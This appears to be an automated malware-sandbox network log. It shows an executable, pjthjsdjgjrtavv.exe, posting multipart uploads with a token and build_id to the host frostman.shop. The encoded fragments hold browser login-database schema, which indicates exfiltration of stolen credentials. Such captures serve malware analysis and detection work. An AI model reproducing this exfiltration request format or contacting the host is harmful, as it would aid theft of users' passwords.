                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:32 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:32 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              14192.168.2.749776116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:32 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----KFUAIWTJM7GVAAIM7GLN
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 55081
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:32 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 46 55 41 49 57 54 4a 4d 37 47 56 41 41 49 4d 37 47 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 55 41 49 57 54 4a 4d 37 47 56 41 41 49 4d 37 47 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 55 41 49 57 54 4a 4d 37 47 56 41 41 49 4d 37 47 4c 4e 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------KFUAIWTJM7GVAAIM7GLNContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------KFUAIWTJM7GVAAIM7GLNContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------KFUAIWTJM7GVAAIM7GLNCont
                                                                                                                                                                                                                                                                              2024-12-20 06:31:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:32 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:32 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:33 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:31:34 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              15192.168.2.749781116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:34 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----3790H479RI5F3EKNYUK6
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 142457
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:34 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 33 37 39 30 48 34 37 39 52 49 35 46 33 45 4b 4e 59 55 4b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 33 37 39 30 48 34 37 39 52 49 35 46 33 45 4b 4e 59 55 4b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 33 37 39 30 48 34 37 39 52 49 35 46 33 45 4b 4e 59 55 4b 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------3790H479RI5F3EKNYUK6Content-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------3790H479RI5F3EKNYUK6Content-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------3790H479RI5F3EKNYUK6Cont
                                                                                                                                                                                                                                                                              2024-12-20 06:31:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:34 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                                              Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                                              2024-12-20 06:31:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
